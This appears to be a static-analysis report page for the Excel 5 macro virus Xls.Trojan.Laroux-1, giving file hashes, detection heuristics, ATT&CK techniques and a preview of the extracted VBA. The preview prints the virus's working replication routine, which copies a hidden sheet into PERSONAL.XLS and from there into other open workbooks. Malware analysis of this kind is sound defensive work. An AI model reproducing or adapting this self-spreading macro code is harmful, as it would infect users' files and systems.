Xls.Trojan.Laroux-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 2fd1b86e691b5962…

MALICIOUS

Office (OLE)

28.5 KB Created: 1998-09-23 02:11:45 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 24b32280e2fac5214f8e4f0698a3493c SHA-1: a01d77133e17369ae24ecc18ba6bfc2b9cfe3764 SHA-256: 2fd1b86e691b59627a8433b113f74c41d781c6d651d75f9cced2abd6fe389410
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel 5 macro virus, identified as Laroux-1 by ClamAV, uses the Auto_Open macro to establish persistence. It attempts to copy itself to PERSONAL.XLS in the Excel startup path and sets up an OnSheetActivate event handler to execute the 'check_files' subroutine, likely to maintain its presence.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-1
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7025 bytes
SHA-256: 4a1d39c5a3a8bc25ed76ee2e051f0ebe6691f3b43f09ec31acec569c771b6adc
Detection
ClamAV: Xls.Trojan.Laroux-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "laroux"


Public aba As String
Public abY As String
Public abM As String
Public abD As String


Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("laroux").Visible = True
    Sheets("laroux").Select
    Sheets("laroux").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("laroux").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "laroux" Then
        Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("laroux").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
End Select
End Sub


' Footer Macro
' Macro recorded 07/12/95 by Andrzej Bujniewicz
'
' Keyboard Shortcut: Ctrl+f
'
Sub Footer()
Attribute Footer.VB_ProcData.VB_Invoke_Func = " \n14"
                 
                 With ActiveSheet.PageSetup
                                  
                                  .LeftFooter = _
                                                   "&""Courier New,Italic""&8&F""&A"""
                 End With
                 ActiveSheet.PrintPreview
                 
End Sub


'
' FilterOff Macro
' Macro recorded 7/31/95 by miles clarke
'
' Keyboard Shortcut: Ctrl+o
'
Sub FilterOff()
Attribute FilterOff.VB_ProcData.VB_Invoke_Func = " \n14"
    
    Sheets("CrewListaux1").Select
    Selection.AutoFilter
End Sub


' PageSetUp Macro
' Macro recorded 19/08/95 by miles clarke
'
' Keyboard Shortcut: Ctrl+s
'
Sub PageSetup()
Attribute PageSetup.VB_ProcData.VB_Invoke_Func = " \n14"
    With ActiveSheet.PageSetup
        .LeftHeader = ""
        .CenterHeader = ""
        .RightHeader = ""
        .LeftFooter = ""
        .CenterFooter = ""
        .RightFooter = ""
        .LeftMargin = Application.InchesToPoints(0.748031496062992)
        .RightMargin = Application.InchesToPoints(0.748031496062992)
        .TopMargin = Application.InchesToPoints(0.984251968503937)
        .BottomMargin = Application.InchesToPoints(0.984251968503937)
        .HeaderMargin = Application.InchesToPoints(0.511811023622047)
        .FooterMargin = Application.InchesToPoints(0.511811023622047)
        .PrintHeadings = False
        .PrintGridlines = True
        .PrintNotes = False
        .CenterHorizontally = True
        .CenterVertically = False
        .Orientation = xlPortrait
        .Draft = False
        .PaperSize = xlPaperA4
        .FirstPageNumber = xlAutomatic
        .Order = xlDownThenOver
        .BlackAndWhite = False
        .Zoom = 100
    End With
    ActiveSheet.PrintPreview
End Sub

'
' OpenCrewList Macro
' Macro recorded 05/23/96 by Baskunchak
'
'
Sub OpenCrewList()
Attribute OpenCrewLis
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.